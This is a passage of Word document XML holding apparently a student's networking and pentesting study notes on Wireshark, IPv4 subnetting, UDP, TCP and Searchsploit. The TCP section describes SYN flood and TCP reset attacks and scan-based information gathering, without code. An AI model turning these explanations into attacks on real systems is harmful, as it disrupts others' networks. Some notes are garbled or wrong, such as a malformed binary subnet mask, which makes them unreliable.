        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00263D34">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:tab/>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This can be run from Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t xml:space="preserve">Brief </w:t>
      </w:r>
      <w:r>
        <w:t>History of TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Internet began in 1969 as</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> ARPA (Advanced Research Projects Agency)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>AHHP was kind of the start of UDP</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ICP provided bidirectional air of streams of traffic kind of like TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>First router was a computer with special interfaces and software.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1973, Vinton Cerf and Robert Kahn reworked the existing idea of ARPA net</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1983 NCP (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ARPAnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> original protocol) was finally shut down and TCP/IP became the main protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1992 work began on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IPng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00263D34">
        <w:t xml:space="preserve"> (IP next generation)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidR="00263D34">
        <w:t xml:space="preserve">later </w:t>
      </w:r>
      <w:r>
        <w:t>becomes IPv6</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>IPv6 attempted to fix some of issues with IPv4, security issues, NAT, limited addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6000" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Packet Capture tool. Also known as </w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t xml:space="preserve">a network </w:t>
      </w:r>
      <w:r>
        <w:t>sniffer.</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6000" w:rsidRPr="009E6000">
        <w:t>Wireshark is the world’s foremost and widely-used network protocol analyser. It lets you see what’s happening on your network at a microscopic level and is the de facto (and often de jure) standard across many commercial and non-profit enterprises, government agencies, and educational institutions.</w:t>
      </w:r>
      <w:r w:rsidR="009E6000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E69" w:rsidRDefault="000E3E69" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3E69">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4086225" cy="2697192"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1" name="Picture 1" descr="Wireshark captur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reshark captured dat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92158" cy="2701109"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="009E6000" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Basic</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> info at top,</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">breaks it down to </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>its</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> layers in the middle</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>RAW</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> data</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> bits at bottom with ASCII </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>equivalent</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Follow TCP stream</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, makes it easier to follow the stream with </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:t>associated packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Filter by HTTP, filter by TCP, makes it easier to find what you're looking for.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00C31CDA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Wireshark for Deep Inspection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00C31CDA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To analyse VoIP calls select telephony from the menu. Can deep dive the data, even playback the original message if it isn't encrypted. Can give call statistics, jitter, and latency, even provide information like who spoke first.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00C31CDA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Statistics: Endpoints will show you all of the different endpoints involved in this packet capture. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00C31CDA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Have a play around and see what statistics you can see. Make some graphs. Flow Graphs, IO Graphs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31CDA" w:rsidRDefault="00C31CDA" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**OSI &amp; TCP/IP Models</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E3E69" w:rsidRPr="000E3E69" w:rsidRDefault="000E3E69" w:rsidP="00263D34">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:eastAsia="Times New Roman" w:hAnsi="Georgia" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en" w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="000E3E69" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="0000FF"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3476625" cy="2312413"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 3" descr="Image result for osi tcp/ip model">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osi tcp/ip model">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22032" cy="2342615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D23FF" w:rsidRDefault="006D23FF" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00263D34" w:rsidRDefault="00263D34" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**IPv4 addresses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4 Octets, each octet is 8 bits. 0 to 255 possible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>00000001 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>00000010 = 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>00000011 = 3 etc...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E3E69" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Subnet mask - </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">255.255.255.0 </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> binary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>11111111.1111111.11111111.000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>192.168.1.24 - with the above subnet mask we can break down the IP as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>192.168.1 = Network portion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>.24 = Host portion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>.0 = Network address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>.255 = Broadcast address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="00124068" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>With</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> the above subnet mask we can have 254 useable hosts. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**U</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">ser </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">atagram </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>rotocol - UDP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>User Datagram Protocol</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve"> is a Transport Layer protocol, Layer 4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">It is a connectionless protocol meaning the data is sent and forgotten about. As there is no error checking carried out it is a faster protocol than TCP which makes it good for gaming, VoIP and streaming. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E3E69" w:rsidRDefault="000E3E69" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">Transmission </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">ontrol </w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>rotocol - TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>TCP is a</w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>lso a Transport Layer Protocol however TCP is c</w:t>
      </w:r>
      <w:r>
        <w:t>onnection orientated</w:t>
      </w:r>
      <w:r w:rsidR="00263D34">
        <w:t xml:space="preserve"> with error correction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t>It u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ses a 3 way handshake between </w:t>
      </w:r>
      <w:r w:rsidR="000E3E69">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sender and recipient. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SYN --&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;--</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">SYN, ACK </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>ACK --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve">handshake </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ensures the recipient is there and </w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>receives</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a message.</w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve"> During the conversation it also carries out checks that it has received each packet and reports back if it has missed one for resending.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="005115BB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYN F</w:t>
      </w:r>
      <w:r w:rsidR="003B567C" w:rsidRPr="005115BB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lood</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> works by </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">attacker sending SYN messages, so </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">recipient opens some memory in buffer ready to build the connection but never finishes the 3 way handshake. </w:t>
      </w:r>
      <w:r>
        <w:t>This causes the m</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve">emory </w:t>
      </w:r>
      <w:r>
        <w:t>to fill</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> up and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> cause</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> DoS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005115BB">
        <w:t>Reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> message is used to block a 3 way handshakes if a port is closed</w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve"> by a FW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve">An attacker can use a </w:t>
      </w:r>
      <w:r w:rsidR="005115BB" w:rsidRPr="005115BB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TCP Reset Attack</w:t>
      </w:r>
      <w:r w:rsidR="005115BB" w:rsidRPr="005115BB">
        <w:t xml:space="preserve"> to tamper or terminate TCP connections. This</w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve"> tampering technique can be used by a firewall in goodwill, or abused by a malicious attacker to interrupt Internet connections. The “Great Firewall of China” is known to use TCP reset attack to interfere with and block connections, as a major method to carry out Internet censorship.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used to tear down connections. </w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t>The teardown uses a 4 way handshake.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="005115BB" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>TCP packets i</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>nclude</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>load of other h</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>eaders; Sequence, Checksu</w:t>
      </w:r>
      <w:r w:rsidR="00124068">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="003B567C">
        <w:t>, Port, Window Size, Acknowledgement Number...</w:t>
      </w:r>
      <w:r w:rsidR="00263D34">
        <w:t xml:space="preserve"> Different header flags can be set to perform different types of scans later in the information gathering phase. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00263D34">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00263D34">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>**Services</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Services are applications that run in the background</w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:t xml:space="preserve"> without any user interaction</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> -ls</w:t>
      </w:r>
      <w:r w:rsidR="005115BB" w:rsidRPr="005115BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005115BB">
        <w:tab/>
        <w:t>-- Listening Services have open ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B567C" w:rsidRDefault="003B567C" w:rsidP="00263D34">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005115BB">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
